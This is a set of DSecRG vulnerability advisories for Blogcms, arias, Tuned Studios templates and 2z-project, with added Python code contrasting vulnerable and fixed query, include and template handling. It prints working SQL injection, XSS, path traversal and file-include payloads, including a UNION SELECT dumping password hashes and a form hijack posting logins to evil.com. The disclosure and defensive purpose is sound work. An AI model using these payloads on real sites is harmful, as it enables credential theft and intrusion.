Versions Affected:       Blogcms 4.2.1b
Vendor URL:              http://blogcms.com/
Bugs:                    SQL Injection, SiXSS, XSS
Exploits:                YES
Reported:                15.01.2008
Vendor response:         16.01.2008
Date of Public Advisory: 16.01.2008
Authors:                 Alexandr Polyakov, Stas Svistunovich
                         Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

The Blogcms system has multiple security vulnerabilities:

1. Multiple SQL Injections
2. Multiple Linked XSS
3. Multiple Linked SiXSS

Details
*******

1. Multiple SQL Injection vulnerabilities

1.1 An attacker can inject SQL code in index.php through the parameter blogid. The value is placed into the query unquoted, so a UNION SELECT reads the member table (including password hashes) back into the search results.

Example:

http://[server]/[installdir]/index.php?query=asd&blogid=1,1)+union+select+1,2,user(),database(),mname,6,7,8,9,10,11,mpassword,13,14,15+from+nucleus_member/*

1.2 An attacker can inject SQL code in the module /blogcms/action.php through the POST parameter user.

Example:

POST /blogcms/action.php HTTP/1.0
Cookie: DokuWiki=g8m41hncjkfjkc4sb1lvmgbiu5
Content-Length: 139
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; DS; .NET CLR 2.0.50727)
Host: 192.168.40.33
Pragma: no-cache
Connection: Keep-Alive

action=addcomment&url=http%3A%2F%2F192.168.40.33%2Fblogcms%2F%3Fitem%3Dblog-cms-4-2-1&itemid=1&body=asd&userid=asd&x=42&y=13&user=asd'+[DSecRG_INJECTION]

---

2. Multiple Linked XSS vulnerabilities

Linked XSS vulnerabilities found in /photo/admin.php and /photo/index.php: the part of the URL after the script name is reflected into the page, so an attacker can inject script through the URL.

Example:

http://[server]/[installdir]/photo/admin.php/;<script>alert('DSECRG_XSS')</script>
http://[server]/[installdir]/photo/index.php/;<script>alert('DSECRG_XSS')</script>

---

3. Multiple SiXSS (XSS through SQL injection error) vulnerabilities

3.1 Linked SiXSS vulnerability found in index.php: the database error message quotes the offending input and is written into the page unescaped, so an attacker can inject XSS code through the SQL error.

Example:

http://[server]/[installdir]/index.php?query=asd&amount=0&blogid=1'<script>alert('DSecRG_XSS')</script>;&x=34&y=6

3.2 Linked SiXSS vulnerability found in /admin/plugins/table/index.php: again the XSS code is reflected in the SQL error. This is also a SQL injection, but because it is reachable only from the admin panel it is rated as not critical.

Example:

http://[server]/[installdir]/admin/plugins/table/index.php?action=edittemplate&field=title'<script>a=/DSecRG XSS/%0d%0aalert(a.source)</script>&id=2&text=0

---

Fix Information
***************

Blogcms was altered to fix these flaws on 16.01.2008. The updated version (4.2.1.c) can be downloaded here:

http://blogcms.com/?item=download

Changelog: http://blogcms.com/wiki/changelog

Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
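The two index.php issues above (the blogid UNION SELECT in 1.1 and the SQL-error reflection in 3.1) share one root cause: user input is concatenated into the statement text, and the resulting database error is echoed to the browser. The following is an added example, not Blogcms code, that reproduces both against an in-memory SQLite database and shows the parameterised query and escaped error page that close them. The table nucleus_member and its columns mname and mpassword are taken from the advisory's payload; the nucleus_item table, its columns, the rows and the query shape are constructed for the demonstration.

```python
# Added example (not blogcms code): string-built query vs. parameterised query, and a
# raw vs. escaped error page, on an in-memory SQLite database with constructed rows.
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: three blog items and two member rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE nucleus_item (inumber INTEGER, ititle TEXT, iblog INTEGER)")
    con.execute("CREATE TABLE nucleus_member (mname TEXT, mpassword TEXT)")
    con.executemany(
        "INSERT INTO nucleus_item VALUES (?, ?, ?)",
        [(1, "hello world", 1), (2, "second post", 1), (3, "other blog", 2)],
    )
    con.executemany(
        "INSERT INTO nucleus_member VALUES (?, ?)",
        [("admin", "21232f297a57a5a743894a0e4a801fc3"), ("editor", "5f4dcc3b5aa765d89ad0")],
    )
    con.commit()
    return con


def search_vulnerable(con: sqlite3.Connection, query: str, blogid: str) -> list:
    """Query built the way the advisory describes: blogid lands inside IN (...) verbatim,
    so '1,1) union select ...' rewrites the statement. The column count (2) is assumed."""
    sql = (
        "SELECT ititle, inumber FROM nucleus_item "
        "WHERE ititle LIKE '%" + query + "%' AND iblog IN (" + blogid + ")"
    )
    return con.execute(sql).fetchall()


def search_safe(con: sqlite3.Connection, query: str, blogid: str) -> list:
    """Hardened form: blogid must parse as an integer, and both values are bound as
    parameters, so the statement text never contains user input."""
    try:
        blog = int(blogid)
    except ValueError:
        raise ValueError("blogid must be an integer") from None
    sql = "SELECT ititle, inumber FROM nucleus_item WHERE ititle LIKE ? AND iblog = ?"
    return con.execute(sql, ("%" + query + "%", blog)).fetchall()


def error_page_vulnerable(err: Exception) -> str:
    """SiXSS: the database error quotes the offending input and is emitted as-is."""
    return "<p>SQL error: " + str(err) + "</p>"


def error_page_safe(err: Exception) -> str:
    """Escaped for the HTML context. In production, log the detail server-side and
    return a generic message; the escaping is shown here so the effect is visible."""
    return "<p>SQL error: " + html.escape(str(err)) + "</p>"


def demo() -> dict:
    """Runs the four paths with the advisory's two payload shapes; returns the results."""
    con = make_db()
    union_payload = "1,1) union select mname, mpassword from nucleus_member/*"
    sixss_payload = "1'<script>alert('DSecRG_XSS')</script>"
    out = {"dumped": search_vulnerable(con, "asd", union_payload)}
    try:
        search_safe(con, "asd", union_payload)
    except ValueError as e:
        out["safe_rejected"] = str(e)
    try:
        search_vulnerable(con, "asd", sixss_payload)
    except sqlite3.OperationalError as e:
        out["vuln_error_page"] = error_page_vulnerable(e)
        out["safe_error_page"] = error_page_safe(e)
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

The UNION branch works because "asd" matches no item, so the only rows returned are the member names and password hashes; the trailing /* swallows the closing parenthesis, exactly as in the advisory's payload. The SiXSS branch shows why the error page matters even when the injection itself fails: the parser error repeats the injected tag verbatim.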
[DSECRG-08-002] Local File Include in arias 0.99-6
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-002

Application:             aria-0.99-6 (Web based ERP)
Versions Affected:       aria-0.99-6
Vendor URL:              http://www.tucows.net/
Bug:                     Local File Include
Exploits:                YES
Reported:                09.01.2008
Vendor Response:         None
Date of Public Advisory: 15.01.2008
Authors:                 Alexandr Polyakov, Stas Svistunovich
                         Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

Aria has a Local File Include vulnerability in the page arias/help/effect.php. The page parameter is taken straight from the query string, checked only with is_file(), and passed to include(), so any file the web server can read (including files outside the help directory, reached with ../ or an absolute path) is included and executed as PHP.

Code:

    if (empty($_GET['page'])) {
        $page = 'help.php';
    } else {
        // user-controlled path, never restricted to the help directory
        $page = $_GET['page'];
    }
    if (false == is_file($page)) {
        $page = 'file_not_found.php';
    }
    // is_file() only confirms that the file exists; ../ sequences and absolute paths pass
    include($page);

Example:

http://[server]/[installdir]/arias/help/effect.php?page=[file]

Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
LFI in Tuned Studios Templates
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-001

Application:             Tuned Studios Templates
Versions Affected:       All
Vendor URL:              http://www.tunedstudios.com
Bug:                     Local File Include
Exploit:                 YES
Reported:                09.01.2008
Date of Public Advisory: 09.01.2008
Authors:                 Alexandr Polyakov, Stas Svistunovich
                         Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

Tuned Studios Templates have a Local File Include vulnerability in the page phpversion/index.php.

Details
*******

Tuned Studios has many templates based on the same vulnerable PHP code:

Code:

    // First check if $page exists
    // With the introduction of PHP 5 we have to capture the $page from the url.
    $page = $_GET['page'];
    if (isset($page) && $page != '') {
        // Check if the page $page exists
        if (file_exists($page.'.php')) {
            // Now we can include the page.
            include($page.'.php');
        } else {
            // Page can't be found, include the error file
            include('data/error404.data.php');
        }
    }

The appended '.php' does not restrict the include: the page parameter can climb out of the template directory with ../ sequences, and a trailing %00 (a NUL byte, at which PHP versions before 5.3.4 silently truncate the path) drops the suffix, so any file on the server can be included.

Example:

http://[server]/[installdir]/index.php?page=../../../../../../../[file]%00

Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
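Both this advisory and the arias one above fail the same way: the include path is built from the page parameter and checked only for existence. The block below is an added example, not code from arias or Tuned Studios, that rebuilds the vulnerable resolution in Python next to two hardened resolvers and runs all three against a constructed directory tree. The file names, the temporary layout and the "secret" file are constructed here; the NUL-byte truncation is emulated explicitly because it reproduces how PHP before 5.3.4 treated a path given to file_exists() and include().

```python
# Added example (not arias / Tuned Studios code): vulnerable include-path resolution vs.
# an allowlist resolver and a realpath-containment resolver, on a constructed tree.
import os
import re
import tempfile
from urllib.parse import unquote


class PageRejected(Exception):
    """The page parameter was refused before touching the filesystem."""


class PageNotFound(Exception):
    """Well-formed name, but no such template."""


def make_fixture() -> tuple:
    """Constructed layout: <tmp>/templates/home.php is a legitimate page and
    <tmp>/secret.txt stands in for any file outside the template directory."""
    root = tempfile.mkdtemp()
    base = os.path.join(root, "templates")
    os.mkdir(base)
    with open(os.path.join(base, "home.php"), "w") as f:
        f.write("<?php echo 'home'; ?>\n")
    secret = os.path.join(root, "secret.txt")
    with open(secret, "w") as f:
        f.write("db_password=hunter2\n")  # constructed content
    return base, secret


def resolve_vulnerable(base_dir: str, raw_page: str) -> str:
    """Mirrors file_exists($page.'.php'); include($page.'.php'): the suffix is appended,
    but ../ is honoured and a NUL byte cuts the C string before the suffix (old PHP)."""
    page = unquote(raw_page)                      # %2e%2e and %00 are decoded for PHP
    candidate = os.path.join(base_dir, page + ".php")
    candidate = candidate.split("\x00", 1)[0]     # emulated PHP < 5.3.4 truncation
    if not os.path.isfile(candidate):
        raise PageNotFound(raw_page)
    return candidate


def resolve_allowlist(base_dir: str, raw_page: str) -> str:
    """Hardened form 1: accept only a bare template name, then build the path."""
    page = unquote(raw_page)
    if "\x00" in page:
        raise PageRejected("NUL byte in page name")
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", page):
        raise PageRejected("page name must be alphanumeric")
    path = os.path.join(base_dir, page + ".php")
    if not os.path.isfile(path):
        raise PageNotFound(page)
    return path


def resolve_realpath(base_dir: str, raw_page: str) -> str:
    """Hardened form 2, for layouts that need subdirectories: canonicalise, then
    require the result to stay under base_dir before looking at the filesystem."""
    page = unquote(raw_page)
    if "\x00" in page:
        raise PageRejected("NUL byte in page name")
    root = os.path.realpath(base_dir)
    path = os.path.realpath(os.path.join(root, page + ".php"))
    if os.path.commonpath([root, path]) != root:
        raise PageRejected("page resolves outside the template directory")
    if not os.path.isfile(path):
        raise PageNotFound(page)
    return path


def demo() -> dict:
    """Runs the advisory-style payload through all three resolvers."""
    base, secret = make_fixture()
    payload = "../secret.txt%00"               # same shape as ../../[file]%00 above
    out = {"vulnerable_is_secret": os.path.samefile(resolve_vulnerable(base, payload), secret)}
    for name, fn in (("allowlist", resolve_allowlist), ("realpath", resolve_realpath)):
        try:
            fn(base, payload)
            out[name] = "included"
        except PageRejected as e:
            out[name] = "rejected: " + str(e)
    try:
        resolve_realpath(base, "../secret")      # traversal without a NUL byte
        out["traversal"] = "included"
    except PageRejected as e:
        out["traversal"] = "rejected: " + str(e)
    out["legit"] = resolve_realpath(base, "home")
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

The allowlist resolver is the right fix when templates are flat files with simple names; the realpath version is for layouts that genuinely need subdirectories, and it rejects a NUL byte up front because os.path functions refuse such paths anyway. Neither should be replaced by stripping "../" from the input, since that leaves absolute paths and encoded variants untouched.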
2z-project 0.9.6.1 Multiple Security Vulnerabilities
Digital Security Research Group [DSecRG] Advisory

Name:                    2z project
Systems Affected:        2z project 0.9.6.1
Vendor URL:              http://2z-project.ru
Authors:                 Alexandr Polyakov, Stas Svistunovich
                         Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)
Reported:                27.12.2007
Vendor response:         27.12.2007
Date of Public Advisory: 28.12.2007

Description
***********

The 2z system has multiple security vulnerabilities:

1. Stored XSS
2. Linked XSS
3. Image XSS
4. Path disclosure
5. Vulnerable password changing algorithm

Details
*******

1. Multiple Stored XSS

1.1 Vulnerability in the script http://[server]/[installdir]/?action=addnews in the POST parameters contentshort and contentfull.

Example:

contentshort=<script>alert('DSecRG XSS')</script>
contentfull=<script>alert('DSecRG XSS')</script>

1.2 Vulnerability in the script http://[server]/[installdir]/2z/admin.php?mod=pm&action=write in the parameter content.

Example:

content=<script>alert('DSecRG XSS')</script>

---

2. Linked XSS

Vulnerability in the page index.php. It works only when the user is not logged in, so it can be used for phishing (see the example). The template /templates/default/usermenu.tpl writes the request URI into the hidden referer field without escaping it; the template is included in index.php, so the login form itself can be hijacked.

Source code of usermenu.tpl:

---
<form name="login" method="post" action="" id="login">
<input type="hidden" name="referer" value="{request_uri}" />   <-- HTML code injected into {request_uri}
<input type="hidden" name="action" value="dologin" />
..
<input onfocus="if (!set_login){set_login=1;this.value='';}" value="{l_name}" class="mw_login_form" type="text" name="username" maxlength="60" size="25" />
..
<input onfocus="if(!set_pass){set_pass=1;this.value='';}" value="{l_password}" class="mw_login_form" type="password" name="password" maxlength="20" size="25" />
..
</form>
---

Example (the payload closes the value attribute of the hidden field and opens a new form whose action points at the attacker's server, so the username and password fields that follow are submitted there):

http://[server]/[installdir]/?"><form/name=login/method=post/action=http://evil.com/sniffer.php/id=login><input/type=hidden/name=referer/value="
http://[server]/[installdir]/index.php?"><form/name=login/method=post/action=http://evil.com/sniffer.php/id=login><input/type=hidden/name=referer/value="

---

3. Image XSS

Vulnerability in the page /2z/?action=profile. An attacker can upload an avatar and a photo containing XSS code. Vulnerable parameters: newavatar, newphoto.

For more information see http://www.dsec.ru/about/articles/web_xss/ (in Russian).

---

4. Path disclosure

By exploiting this issue, an attacker may gain sensitive information on the directory structure of the server machine, which allows further attacks against the site.

Example:

http://[server]/[installdir]/index.php?template=test
http://[server]/[installdir]/?year=1234&month=06

---

5. Password changing vulnerability

The old password is not required to change the password, so a hijacked or unattended session is enough to take over the account.

---

Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
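The login-form hijack in item 2 above, the stored XSS in item 1, and the path-reflecting XSS in Nucleus action.php and blogcms /photo/*.php earlier on this page all come down to one missing step: attribute or text encoding at the point where untrusted data enters the HTML. The block below is an added example, not 2z-project, Nucleus or blogcms code. It renders a reduced copy of the usermenu.tpl form quoted above with the request URI either inserted raw (as the template does) or attribute-escaped, then parses the result to list where each form posts. The phishing URI, the placeholder values and the form collector are constructed here, and the example assumes the payload characters reach the template exactly as written (in reality the value comes from the raw request line and must survive the browser's URL encoding).

```python
# Added example (not project code): raw vs. escaped rendering of the usermenu.tpl
# login form, with an HTML parser that reports the action of every <form> it finds.
import html
from html.parser import HTMLParser

# Constructed payload: closes the value="..." attribute of the hidden referer field,
# ends the real form, and opens a new one whose action is the attacker's collector,
# so the username/password inputs that follow in the template belong to it.
PHISHING_URI = (
    '/?"></form><form name=login method=post action=http://evil.com/sniffer.php>'
    '<input type=hidden name=referer value="'
)

# Reduced copy of the template quoted in the advisory (onfocus handlers omitted).
USERMENU_TPL = """<form name="login" method="post" action="" id="login">
<input type="hidden" name="referer" value="{request_uri}" />
<input type="hidden" name="action" value="dologin" />
<input value="{l_name}" class="mw_login_form" type="text" name="username" maxlength="60" size="25" />
<input value="{l_password}" class="mw_login_form" type="password" name="password" maxlength="20" size="25" />
</form>
"""


def render_usermenu(request_uri: str, escape_output: bool) -> str:
    """escape_output=False reproduces the vulnerable template. True is the fix:
    html.escape(quote=True) turns " into &quot; as well as < > & so the attribute
    cannot be closed and no tag can be opened from inside it. The same call is what
    contentshort/contentfull (stored XSS) and a reflected request path need."""
    enc = (lambda s: html.escape(s, quote=True)) if escape_output else (lambda s: s)
    return (USERMENU_TPL
            .replace("{request_uri}", enc(request_uri))
            .replace("{l_name}", enc("Login"))
            .replace("{l_password}", enc("Password")))


class FormCollector(HTMLParser):
    """Records the action attribute of every <form> start tag, in document order."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action") or "")


def form_actions(page: str) -> list:
    """Where would a browser post each form on this page?"""
    parser = FormCollector()
    parser.feed(page)
    parser.close()
    return parser.actions


if __name__ == "__main__":
    print("raw     :", form_actions(render_usermenu(PHISHING_URI, escape_output=False)))
    print("escaped :", form_actions(render_usermenu(PHISHING_URI, escape_output=True)))
```

With raw insertion the parser sees two forms, the second posting to evil.com with the real password field inside it; with escaping there is exactly one form and the whole payload is inert text inside the referer value. The check is also a usable regression test for a template: render with a known breakout payload and assert the form count and actions did not change.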